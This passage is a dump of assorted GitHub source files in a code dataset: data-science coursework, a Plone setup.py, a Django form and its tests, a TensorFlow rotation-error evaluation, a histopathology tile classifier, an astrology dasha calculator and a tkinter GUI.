[center[0]]\n new_df['Longitude'] += [center[1]]\n\n new_df = pd.DataFrame(new_df)\n\n # Now, we can put these centers into a new MongoDB collection\n json_set = new_df.to_json(orient='records')\n r = json.loads(json_set)\n\n repo.dropCollection(\"crime_incident_centers\")\n repo.createCollection(\"crime_incident_centers\")\n repo['esaracin.crime_incident_centers'].insert_many(r)\n repo['esaracin.crime_incident_centers'].metadata({'complete':True})\n print(repo['esaracin.crime_incident_centers'].metadata())\n\n\n repo.logout()\n\n endTime = datetime.datetime.now()\n\n return {\"start\":startTime, \"end\":endTime}\n\n @staticmethod\n def provenance(doc = prov.model.ProvDocument(), startTime = None, endTime = None): \n '''Creates the provenance document describing the merging of data\n occuring within this script.'''\n \n # Set up the database connection\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('esaracin', 'esaracin')\n\n # Add useful namespaces for this prov doc\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/')\n doc.add_namespace('dat', 'http://datamechanics.io/data/')\n doc.add_namespace('ont', 'http://datamechanics/io/ontology/')\n doc.add_namespace('log', 'http://datamechanics.io/log/')\n\n # Add this script as a provenance agent to our document. Also add the\n # entity and activity utilized and completed by this script.\n this_script = doc.agent('alg:esaracin#kmeans_crime_incidents', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\n resource_crimes = doc.entity('dat:esaracin#crime_incidents',{'prov:label':'MongoDB Set',prov.model.PROV_TYPE:'ont:DataResource'})\n clustering = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\n\n doc.wasAssociatedWith(clustering, this_script)\n doc.usage(clustering, resource_crimes, startTime, None, {prov.model.PROV_TYPE:'ont:Transformation'})\n\n clustered = doc.entity('dat:esaracin#crime_incident_centers', {prov.model.PROV_LABEL:'Clustered Set', prov.model.PROV_TYPE:'ont:DataSet'})\n doc.wasAttributedTo(clustered, this_script)\n doc.wasGeneratedBy(clustered, clustering, endTime)\n doc.wasDerivedFrom(clustered, resource_crimes, clustering, clustering, clustering)\n\n\n repo.logout()\n return doc\n\nkmeans_crime_incidents.execute()\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"esaracin/kmeans_crime_incidents.py","file_name":"kmeans_crime_incidents.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19064351764","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='emc.kb',\n version=version,\n description=\"a knowleage base for EMC project\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='python plone',\n author='Adam tang',\n author_email='yuejun.tang@gmail.com',\n url='https://github.com/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['emc'],\n include_package_data=True,\n zip_safe=False, \n install_requires=[\n 'setuptools',\n 'MySQL-python',\n 'SQLAlchemy',\n 'collective.autopermission',\n 'plone.app.dexterity',\n 'plone.namedfile [blobs]',\n 'plone.app.registry',\n 'plone.app.z3cform',\n 'plone.app.relationfield',\n 'z3c.caching',\n 'zope.annotation', \n # -*- Extra requirements: -*-\n ],\n extras_require={\n 'test': ['plone.app.testing',]\n }, \n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n\n )\n","repo_name":"MWatHIT/Project","sub_path":"emc/src/emc.kb/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38845839737","text":"import multiprocessing as mp\nimport newspaper\nimport os\nimport hashlib\nimport traceback\nimport tldextract\nimport tqdm\nfrom filter import should_exclude\n\nhash = hashlib.sha256\n\ntry:\n os.mkdir('data')\nexcept FileExistsError:\n pass\n\n\ndef dl(url):\n url = url.strip()\n\n if should_exclude(url):\n return\n\n ext = tldextract.extract(url)\n domain = '.'.join([x for x in ext if x])\n\n fname = 'data/{}-{}.txt'.format(domain, hash(url.encode()).hexdigest())\n if os.path.isfile(fname):\n return\n# print('Downloading', url)\n try:\n article = newspaper.Article(url, fetch_images=False)\n article.download()\n article.parse()\n except newspaper.article.ArticleException:\n# print('Dead link:', url)\n return\n# traceback.print_exc()\n\n text = article.text\n\n \n if text.strip() == '':\n# print('Empty')\n return\n\n with open(fname, 'w') as out:\n out.write(text)\n\n\nif __name__ == '__main__':\n p = mp.Pool(100) # num of download threads\n with open('urls.txt') as fh:\n urls = list(fh)\n\n list(tqdm.tqdm(p.imap(dl, urls), total=len(urls)))\n print('Done!')\n","repo_name":"yet-another-account/openwebtext","sub_path":"download_old.py","file_name":"download_old.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"61"} +{"seq_id":"10148150263","text":"from django import forms\nfrom django.forms import ModelForm, fields\nfrom django.forms import widgets\nfrom django.forms.models import ModelChoiceField\nfrom django.forms.widgets import Widget\nfrom .models import Motivo, Usuario\n\n\nclass VehiculoForm(forms.ModelForm):\n\n class Meta:\n model=Vehiculo\n fields = ['patente', 'marca', 'modelo', 'categoria']\n labels ={\n 'patente': 'Patente de vehiculo',\n 'marca': 'Marca de vehiculo',\n 'modelo': 'Model de vehiculo',\n 'categoria': 'Categoria de vehiculo',\n \n }\n widgets={\n 'patente': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder':'Ingrese patente',\n 'id': 'patente'\n }\n ),\n 'marca': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Ingrese marca',\n 'id': 'marca'\n }\n ),\n 'modelo': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Ingrese modelo',\n 'id': 'modelo'\n }\n ),\n 'categoria': forms.Select(\n attrs={\n 'class': 'form-control',\n 'id': 'categoria',\n }\n )\n }","repo_name":"ipiknipsi/Exp3Backend_AlvarezRetamalOrtiz_004D","sub_path":"Update 1 implementación template y Django/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70839674435","text":"import tensorflow as tf\nimport numpy as np\nfrom . import loss\nfrom scipy.spatial.transform import Rotation as R\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n# Copied from tensorflow graphics API\n# https://github.com/tensorflow/graphics/blob/master/tensorflow_graphics/geometry/transformation/rotation_matrix_3d.py\ndef _build_matrix_from_sines_and_cosines(sin_angles, cos_angles):\n \"\"\"Builds a rotation matrix from sines and cosines of Euler angles.\n Note:\n In the following, A1 to An are optional batch dimensions.\n Args:\n sin_angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the sine of the Euler angles.\n cos_angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the cosine of the Euler angles.\n Returns:\n A tensor of shape `[A1, ..., An, 3, 3]`, where the last two dimensions\n represent a 3d rotation matrix.\n \"\"\"\n sin_angles.shape.assert_is_compatible_with(cos_angles.shape)\n\n sx, sy, sz = tf.unstack(sin_angles, axis=-1)\n cx, cy, cz = tf.unstack(cos_angles, axis=-1)\n m00 = cy * cz\n m01 = (sx * sy * cz) - (cx * sz)\n m02 = (cx * sy * cz) + (sx * sz)\n m10 = cy * sz\n m11 = (sx * sy * sz) + (cx * cz)\n m12 = (cx * sy * sz) - (sx * cz)\n m20 = -sy\n m21 = sx * cy\n m22 = cx * cy\n matrix = tf.stack((m00, m01, m02,\n m10, m11, m12,\n m20, m21, m22),\n axis=-1) # pyformat: disable\n output_shape = tf.concat((tf.shape(input=sin_angles)[:-1], (3, 3)), axis=-1)\n return tf.reshape(matrix, shape=output_shape)\n\ndef from_euler(angles, name=None):\n r\"\"\"Convert an Euler angle representation to a rotation matrix.\n The resulting matrix is $$\\mathbf{R} = \\mathbf{R}_z\\mathbf{R}_y\\mathbf{R}_x$$.\n Note:\n In the following, A1 to An are optional batch dimensions.\n Args:\n angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the three Euler angles. `[A1, ..., An, 0]` is the angle about\n `x` in radians `[A1, ..., An, 1]` is the angle about `y` in radians and\n `[A1, ..., An, 2]` is the angle about `z` in radians.\n name: A name for this op that defaults to \"rotation_matrix_3d_from_euler\".\n Returns:\n A tensor of shape `[A1, ..., An, 3, 3]`, where the last two dimensions\n represent a 3d rotation matrix.\n Raises:\n ValueError: If the shape of `angles` is not supported.\n \"\"\"\n with tf.compat.v1.name_scope(name, \"rotation_matrix_3d_from_euler\", [angles]):\n angles = tf.convert_to_tensor(value=angles)\n\n sin_angles = tf.sin(angles)\n cos_angles = tf.cos(angles)\n return _build_matrix_from_sines_and_cosines(sin_angles, cos_angles)\n\ndef compute_euler_angles_from_rotation_matrices(rotation_matrices):\n R = rotation_matrices\n sy = tf.sqrt(R[:, 0, 0] * R[:, 0, 0] + R[:, 1, 0] * R[:, 1, 0])\n singular = sy < 1e-6\n singular = tf.cast(singular, tf.float32)\n\n x = tf.atan2(R[:, 2, 1], R[:, 2, 2])\n y = tf.atan2(-R[:, 2, 0], sy)\n z = tf.atan2(R[:, 1, 0], R[:, 0, 0])\n\n xs = tf.atan2(-R[:, 1, 2], R[:, 1, 1])\n ys = tf.atan2(-R[:, 2, 0], sy)\n zs = R[:, 1, 0] * 0\n\n x = x * (1 - singular) + xs * singular\n y = y * (1 - singular) + ys * singular\n z = z * (1 - singular) + zs * singular\n\n out_euler = tf.stack([x, y, z], axis=1)\n\n return out_euler\n\n# Input: batch*n\n# Output: batch*n normalize\ndef normalize_vector(v, return_mag=False):\n v_mag = tf.math.sqrt(tf.math.reduce_sum(tf.math.pow(v, 2), axis=1))\n v_mag = tf.math.maximum(v_mag, tf.constant(1e-8))\n v_mag = tf.repeat(tf.reshape(v_mag, (-1, 1)), v.shape[1], axis=1)\n v = v / v_mag\n if (return_mag == True):\n return v, v_mag[:, 0]\n else:\n return v\n\ndef cross_product(u, v):\n #batch = u.shape[0]\n i = u[:, 1] * v[:, 2] - u[:, 2] * v[:, 1]\n j = u[:, 2] * v[:, 0] - u[:, 0] * v[:, 2]\n k = u[:, 0] * v[:, 1] - u[:, 1] * v[:, 0]\n\n out = tf.concat((tf.reshape(i, (-1, 1)), tf.reshape(j, (-1, 1)), tf.reshape(k, (-1, 1))), 1)\n return out\n\ndef compute_rotation_matrix_from_ortho6d(ortho6d):\n x_raw = ortho6d[:, 0:3] # batch*3\n y_raw = ortho6d[:, 3:6] # batch*3\n\n x = normalize_vector(x_raw) # batch*3\n z = cross_product(x, y_raw) # batch*3\n z = normalize_vector(z) # batch*3\n y = cross_product(z, x) # batch*3\n\n x = tf.reshape(x, (-1, 3, 1))\n y = tf.reshape(y, (-1, 3, 1))\n z = tf.reshape(z, (-1, 3, 1))\n matrix = tf.concat((x, y, z), 2) # batch*3*3\n return matrix\n\n# http://www.boris-belousov.net/2016/12/01/quat-dist/\ndef compute_geodesic_distance_from_two_matrices(m1, m2):\n m = tf.matmul(m1, tf.transpose(m2, perm=[0, 2, 1]))\n\n cos = (m[:, 0, 0] + m[:, 1, 1] + m[:, 2, 2] - 1) / 2\n cos = tf.clip_by_value(cos, clip_value_min=-1, clip_value_max=1)\n\n theta = tf.math.acos(cos)\n\n return theta\n\ndef apply_mask(images, masks, extra=0):\n if extra > 0:\n kernel = np.ones((extra+1, extra+1))\n masks = cv2.dilate(masks, kernel, iterations=1)\n\n masks = np.expand_dims(masks, axis=3)\n masks = np.repeat(masks, 3, axis=3)\n images = images*masks\n return images\n\n\ndef calculate_errors(errors):\n mean = np.mean(errors)\n std = np.std(errors)\n max = np.max(errors)\n return mean, std, max\n\n\ndef print_errors(mean, std, max):\n print(\"*****************\")\n print(\"Mean: %f\" % mean)\n print(\"Std: %f\" % std)\n print(\"Max: %f\" % max)\n print(\"*****************\")\n\ndef get_indices_from_max2min(array):\n return np.flip(np.argsort(array))\n\n# Input: ground truth orientations 3x3 rotation matrix, predicted orientations 3x3 rotation matrix, image_ids\ndef evaluate(gt_orientations, pred_orientations, dataset, save_dir, show=5):\n gt_orientations = gt_orientations.astype(np.float32)\n\n print(\"Evaluation\")\n # Geodesic distance\n geo_errors = compute_geodesic_distance_from_two_matrices(gt_orientations, pred_orientations) * 180 / np.pi\n sess = tf.compat.v1.Session()\n geo_errors = sess.run(geo_errors)\n mean, std, max = calculate_errors(geo_errors)\n print(\"Geodesic distance: \")\n print_errors(mean, std, max)\n\n # Euclidean distance\n euc_errors = loss.euc_dist_keras(gt_orientations, pred_orientations)\n euc_errors = sess.run(euc_errors)\n mean, std, max = calculate_errors(euc_errors)\n print(\"Euclidean distance: \")\n print_errors(mean, std, max)\n\n # Get the list of errors in a asc way\n ann_per_image = len(dataset.image_info[0][\"annotations\"])\n indices = get_indices_from_max2min(geo_errors)\n image_indices = np.trunc(indices / ann_per_image).astype(int)\n annotation_indices = indices % ann_per_image\n\n # For each error get its pred_angles and gt_angles\n print(\"\\n*********************\")\n print(\"Errors in asc order: \")\n print(\"*********************\\n\")\n for i in range(0, image_indices.shape[0]):\n id = image_indices[i]\n ann_id = annotation_indices[i]\n annotation = dataset.image_info[id][\"annotations\"][ann_id]\n gt_angles = annotation['orientation']\n pred_orientation = pred_orientations[indices[i]]\n rotation = R.from_matrix(pred_orientation)\n pred_angles = rotation.as_euler('ZYX', degrees=True)\n geo_error = geo_errors[indices[i]]\n euc_error = np.mean(euc_errors[indices[i]])\n if i < show:\n print(\"Number %i\" % i)\n print(\"Geodesic error: %f\" % geo_error)\n print(\"Euclidean error: %f\" % euc_error)\n print(\"Ground truth orientation: X: %f, Y: %f, Z: %f\" % (gt_angles[0], gt_angles[1], gt_angles[2]))\n print(\"Predicted orientation: X: %f, Y: %f, Z: %f\" % (pred_angles[0], pred_angles[1], pred_angles[2]))\n\n hist_geo_errors = geo_errors#np.round(geo_errors)\n hist, _, _ = plt.hist(hist_geo_errors, bins=360, range=(0, 180))\n plt.title('Geodesic distance error')\n plt.xlabel(\"Error\")\n plt.ylabel(\"Frequency\")\n plt.savefig(os.path.join(save_dir, \"geo_hist.png\"))\n\n\ndef main():\n # Test normalize vector\n v = tf.constant([[5., 0., 0.], [2., 2., 4.], [0., 0., 7.]])\n normalized = normalize_vector(v)\n sess = tf.compat.v1.Session()\n normalized = sess.run(normalized)\n print(normalized)\n\n # Test cross product\n v = tf.constant([[1, 2, 3]])\n u = tf.constant([[4, 5, 6]])\n cross = cross_product(u, v)\n cross = sess.run(cross)\n print(cross)\n\n # Rotation matrix from ortho 6d\n v = tf.constant([[1., 2., 3., 4., 5., 6.]])\n rm = compute_rotation_matrix_from_ortho6d(v)\n rm = sess.run(rm)\n print(rm)\n\n # Rotation matrix from euler ZYX\n angles = np.radians(np.array([180., 20., 70.]))\n euler = tf.constant(angles)\n rm = from_euler(euler)\n rm = sess.run(rm)\n print(rm)\n\n # Euler from rotation matrix\n euler = compute_euler_angles_from_rotation_matrices(rm.reshape(1, 3, 3))\n euler = sess.run(euler)\n print(np.degrees(euler))\n\n # Geodesic error\n angles1 = np.radians(np.array([[33., -11., 79.], [33., -11., 79.], [45., 70., -50.]]).astype(np.float))\n euler = tf.constant(angles1)\n rm1 = from_euler(euler)\n angles2 = np.radians(np.array([[32., 7.51, -109], [32., 7.51, -109], [-300, 55, 44]]).astype(np.float))\n euler = tf.constant(angles2)\n rm2 = from_euler(euler)\n error = compute_geodesic_distance_from_two_matrices(rm1, rm2)\n error = tf.math.reduce_mean(error)\n error = sess.run(error)\n print(error)\n\nif __name__ == \"__main__\":\n main()","repo_name":"anton-cid-mejias/Orientation","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16207192345","text":"from hora import const, utils\nfrom hora.panchanga import panchanga\nfrom hora.horoscope.chart import charts\ndef patyayini_dhasa(jd_years,place,ayanamsa_mode='Lahiri',divisional_chart_factor=1):\n \"\"\"\n Compute Patyaayini Dhasa\n Should be used for Tajaka Annual charts\n @param jd_years:Julian day number for Tajaka Annual date/time\n @param place: panchanga.Place struct tuple of ('Place',latitude,longitude,time_zone_offset)\n @param ayanamsa_mode: Default = 'Lahiri'\n @param divisional_chart_factor: Default = 1 (Raasi) - See const.division_chart_factors for other possible values\n @return patyayini dhasa values as a list [planet, dhasa_duration in days]\n Example: [[5, (1993, 6, 26), 24.9], [3, (1993, 8, 13), 48.1], [1, (1993, 8, 14), 0.57],...]]\n \"\"\"\n cht = charts.divisional_chart(jd_years,place,ayanamsa_mode,divisional_chart_factor)\n cht_1 = cht[:-2] # Exclude Rahu and Ketu\n cht_1.sort(key=lambda x:x[1][1])\n max_long = max(cht_1, key=lambda x:x[1][-1])[1][1]\n cht_2 = []\n for i,[p,(h,long)] in enumerate(cht_1):\n if i==0:\n cht_2.append([p,round(long/max_long*const.average_gregorian_year,2)])\n else:\n long1 = long - cht_1[i-1][1][1]\n cht_2.append([p,round(long1/max_long*const.average_gregorian_year,2)])\n jd_start = jd_years\n cht3 = []\n for p,dd in cht_2:\n jd_end = jd_start + dd\n dhasa_end = utils.jd_to_gregorian(jd_end)[:3]\n cht3.append([p,dhasa_end,dd])\n jd_start = jd_end \n return cht3\nif __name__ == \"__main__\":\n jd_at_dob = utils.julian_day_number((1996,12,7),(10,34,0))\n place = panchanga.Place('unknown',13.0389,80.2619,5.5)\n divisional_chart_factor = 9\n ayanamsa_mode = 'Lahiri'\n years = 26\n jd_at_years = jd_at_dob + years*const.sidereal_year\n cht=patyayini_dhasa(jd_at_years, place, ayanamsa_mode, divisional_chart_factor)\n print(cht)\n years = 30\n jd_at_years = jd_at_dob + years*const.sidereal_year\n cht=patyayini_dhasa(jd_at_years, place, ayanamsa_mode, divisional_chart_factor)\n print(cht)\n ","repo_name":"naturalstupid/PyHora","sub_path":"hora/horoscope/dhasa/patyayini.py","file_name":"patyayini.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"40818817415","text":"import tkinter as tk\nfrom tkinter import ttk\n\nlist_of_years = sorted([2019, 2020, 2021])\n\n\ndef get_required_years_list():\n\n start_year = int(list_of_avail_years_start.get())\n stop_year = int(list_of_avail_years_stop.get())\n step = int(spin_step.get())\n\n if step == 0:\n required_years = [str(start_year), str(stop_year)]\n else:\n if start_year == \"\":\n required_years = \"Ustaw rok początkowy\"\n elif stop_year == \"\":\n required_years = [year for year in range(start_year, min(max(list_of_years), start_year + 4 * step\n + 1), step)]\n else:\n required_years = [year for year in range(start_year, stop_year + 1, step)]\n\n return required_years\n\ndef update_preview():\n required_years_list = get_required_years_list()\n\n required_years_list_str = [str(year) for year in required_years_list]\n years_preview[\"text\"] = \", \".join(required_years_list_str)\n\n\ndef generate_new_ver_file():\n print(\"Powiedzmy, że działa\")\n main_window.destroy()\n\n\nmain_window = tk.Tk()\nmain_window.geometry(\"450x210\")\nmain_window.title(\"IKMR - Etap I - tworzenie przyszłych sieci\")\n\nlabel_start_year = tk.Label(main_window, text=\"Rok bazowy:\").grid(row=0, column=0, padx=20, pady=20)\nlist_of_avail_years_start = ttk.Combobox(main_window, values=list_of_years)\nlist_of_avail_years_start.grid(row=0, column=2, padx=5, pady=20)\n\nlabel_stop_year = tk.Label(main_window, text=\"Rok końcowy:\").grid(row=1, column=0, padx=20)\nlist_of_avail_years_stop = ttk.Combobox(main_window, values=list_of_years)\nlist_of_avail_years_stop.grid(row=1, column=2, padx=5)\n\nlabel_spin_step = tk.Label(main_window, text=\"Krok dla kolejnych lat:\").grid(row=2, column=0, padx=50, pady=20)\nspin_step = tk.Spinbox(main_window, from_ = 0, to = 10, width=5)\nspin_step.grid(row=2, column=2, padx=10, pady=20)\n\nlabel_years_preview = tk.Label(main_window, text=\"Wybrane lata\").grid(row=3, column=0)\nyears_preview = tk.Message(main_window, width=200, text=\"\")\nyears_preview.grid(row=3, column=2)\n\nbutton_preview = tk.Button(main_window, text=\"Podgląd lat\", command=update_preview).grid(row=4, column=0, pady=5)\nbutton_execute = tk.Button(main_window, text=\"OK\", command=generate_new_ver_file).grid(row=4, column=1, pady=5)\nbutton_cancel = tk.Button(main_window, text=\"Anuluj\", command=main_window.destroy).grid(row=4, column=2, pady=5)\n\nmain_window.mainloop()\n","repo_name":"Cookiee-monster/VISUM_IKMR","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33181396445","text":"from django.test import TestCase\nfrom tasks.build_template_context import BuildTemplateContext\nfrom django.contrib.auth.models import User\nfrom tasks.models import TaskList, SimpleTask\n\n\nclass BuildTemplateContextTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username=\"test@test.com\",\n email=\"test@test.com\",\n password=\"testpassword\")\n self.email = user.email\n TaskList.objects.create(user=user, name=\"Loisirs\", color=\"#55b37e\")\n\n self.tasks = SimpleTask.objects.filter(tasklist__user=user)\n\n self.all_keys = ['overdue_tasks', 'due_today_tasks',\n 'due_tommorow_tasks', 'future_tasks', 'no_date_tasks',\n 'finished_tasks', 'all_tasklists', 'tasklist_to_show']\n\n self.current_keys = ['overdue_tasks', 'due_today_tasks',\n 'due_tommorow_tasks', 'future_tasks',\n 'no_date_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.finished_keys = ['finished_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.urgent_keys = ['urgent_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.important_keys = ['important_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.matrix_keys = ['important_urgent', 'important_non_urgent',\n 'non_important_urgent', 'non_important_non_urgent',\n 'matrix_backlog']\n\n def test_display_all(self):\n test_obj = BuildTemplateContext('all', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.all_keys)\n\n def test_display_current(self):\n test_obj = BuildTemplateContext('current', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.current_keys)\n\n def test_display_finished(self):\n test_obj = BuildTemplateContext('finished', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.finished_keys)\n\n def test_display_urgent(self):\n test_obj = BuildTemplateContext('urgent', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.urgent_keys)\n\n def test_display_important(self):\n test_obj = BuildTemplateContext('important', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.important_keys)\n\n def test_display_matrix(self):\n test_obj = BuildTemplateContext('matrix', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.matrix_keys)\n","repo_name":"AntoineMaurin/Melius","sub_path":"tasks/tests/unit/test_build_template_context.py","file_name":"test_build_template_context.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31713390752","text":"# Read downsampled masks (512x downsampled) and output an excel to extract every pixel value\r\n\r\nimport numpy as np\r\nimport os \r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nmask_dir = 'Camelyon16/Testing/Tumor Masks (512x downsampled)' # All masks should be in numpy array format\r\noutput_dir = 'Camelyon16/Testing/Tumor Masks Pixel Information'\r\nlist_of_mask = os.listdir(mask_dir)\r\n\r\nthreshold = 0.5\r\n\r\nfor i in tqdm(range(0,len(list_of_mask))):\r\n record = {'x':[],'y':[],'raw_val':[],'corr_prediction':[]}\r\n mask = np.load(f'{mask_dir}/{list_of_mask[i]}')\r\n for y in range(0,mask.shape[0]):\r\n for x in range(0,mask.shape[1]):\r\n val = mask[y,x]\r\n record['x'].append(int(x * 512))\r\n record['y'].append(int(y * 512))\r\n record['raw_val'].append(val / 3) \r\n if val / 3 >= threshold:\r\n corr_pred = 1\r\n else:\r\n corr_pred = 0\r\n record['corr_prediction'].append(corr_pred)\r\n record_df = pd.DataFrame(data = record)\r\n record_df.to_csv(f'{output_dir}/{list_of_mask[i].replace(\"_tumor_mask.npy\",\".csv\")}',index=None)\r\n \r\n#%% Tile-level Analysis\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os \r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndef get_heatmap(img):\r\n cmap = plt.get_cmap('jet')\r\n rgb_img = cmap(img)\r\n return rgb_img[:,:,0:3]\r\n\r\nimport_dir = 'Camelyon16/Testing/Testing Set'\r\nmodel_dir = 'Camelyon16/Training/Training Results/Model_InceptionV3/model_ckpt'\r\nsave_dir = 'Camelyon16/Testing/Testing Results/Model_InceptionV3'\r\ngt_dir = 'Camelyon16/Testing/Tumor Masks Pixel Information'\r\ngt_npy_dir = 'Camelyon16/Testing/Tumor Masks (512x downsampled)'\r\n\r\nif not os.path.exists(save_dir):\r\n os.mkdir(save_dir)\r\n\r\nrecord = {'case_name':[],'x':[],'y':[],'prediction_normal':[],'prediction_tumor':[],'ground_truth':[]}\r\ntest_case = os.listdir(import_dir)\r\nnum_test_case = len(test_case)\r\n\r\ntile_dim = 512\r\nthreshold = 0.5\r\n\r\n# Load model\r\nmodel = tf.keras.models.load_model(model_dir)\r\n\r\nfor case_i in tqdm(range(0,num_test_case)):\r\n # Load ground truth information\r\n if os.path.exists(f'{gt_dir}/{test_case[case_i]}.csv'):\r\n gt = pd.read_csv(f'{gt_dir}/{test_case[case_i]}.csv')\r\n gt_slide = np.load(f'{gt_npy_dir}/{test_case[case_i]}_tumor_mask.npy')\r\n gt_slide = gt_slide / 3\r\n slide_shape = gt_slide.shape\r\n \r\n case_dir = f'{import_dir}/{test_case[case_i]}'\r\n tile_in_case_list = os.listdir(case_dir)\r\n num_tile = len(tile_in_case_list)\r\n \r\n pred_slide_th = np.zeros(slide_shape)\r\n pred_slide_heatmap = np.zeros(slide_shape)\r\n \r\n for tile_i in tqdm(range(0,num_tile)):\r\n tile_load = plt.imread(f'{case_dir}/{tile_in_case_list[tile_i]}')\r\n tile_load = tile_load / 255.0\r\n tile_load = np.reshape(tile_load,(1,512,512,3))\r\n \r\n # Get prediction\r\n prediction = model.predict(tile_load)\r\n pred_normal = float(prediction[:,0]) # Percentage to be normal\r\n pred_tumor = float(prediction[:,1]) # Percentage to be tumor-containing\r\n \r\n # Coordinates\r\n coordinates = tile_in_case_list[tile_i].replace('.jpg','')\r\n coor_x = int(coordinates.split('_')[0])\r\n coor_y = int(coordinates.split('_')[1])\r\n \r\n # Check prediction\r\n x_positive = gt[gt['x'] == coor_x]\r\n x_positive = x_positive.reset_index(drop = True)\r\n xy_positive = x_positive[x_positive['y'] == coor_y]\r\n xy_positive = xy_positive.reset_index(drop = True)\r\n correct_pred = int(xy_positive['corr_prediction'])\r\n \r\n record['case_name'].append(test_case[case_i])\r\n record['x'].append(coor_x)\r\n record['y'].append(coor_y)\r\n record['prediction_normal'].append(pred_normal)\r\n record['prediction_tumor'].append(pred_tumor)\r\n record['ground_truth'].append(correct_pred)\r\n \r\n # Construct heatmap\r\n if pred_tumor >= threshold:\r\n decision = 1 # Exist tumor\r\n else:\r\n decision = 0 # No tumor\r\n \r\n small_coor_x = int(coor_x / tile_dim)\r\n small_coor_y = int(coor_y / tile_dim)\r\n pred_slide_th[small_coor_y,small_coor_x] = decision\r\n pred_slide_heatmap[small_coor_y,small_coor_x] = pred_tumor\r\n \r\n gt_slide_rgb = get_heatmap(gt_slide)\r\n pred_slide_rgb = get_heatmap(pred_slide_heatmap)\r\n \r\n plt.imshow(gt_slide_rgb)\r\n plt.show()\r\n plt.imshow(pred_slide_rgb)\r\n plt.show()\r\n \r\n slide_save = f'{save_dir}/{test_case[case_i]}'\r\n if not os.path.exists(slide_save):\r\n os.mkdir(slide_save)\r\n \r\n plt.imsave(f'{slide_save}/gt_slide_threshold.png',gt_slide,cmap='gray')\r\n plt.imsave(f'{slide_save}/gt_slide_heatmap.png',gt_slide_rgb)\r\n plt.imsave(f'{slide_save}/pred_slide_threshold.png',pred_slide_th,cmap='gray')\r\n plt.imsave(f'{slide_save}/pred_slide_heatmap.png',pred_slide_rgb)\r\n \r\nrecord_df = pd.DataFrame(data = record)\r\nrecord_df.to_csv(f'{save_dir}/record.csv',index=None)\r\n","repo_name":"pakfor/Deep-Learning-of-Histopathological-Images-for-Identification-of-Different-Diseases","sub_path":"Task 1 Approach 1/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22746937488","text":"\"\"\"This script creates a new README.md file in the root folder of the project\nby copying the contents of the file at docs/index.md, while applying some\ntransformations to the contents of the file to adapt it to work well on GitHub.\n\"\"\"\n\nimport re\n\nfrom ..common import repo_url, site_url\n\nMAIN_INDEX_PATH = \"./docs/index.md\"\nGITHUB_README_PATH = \"./README.md\"\nBASE_URL = \"https://www.locationhistoryformat.com/\"\nDISCLAIMER_HEADER = 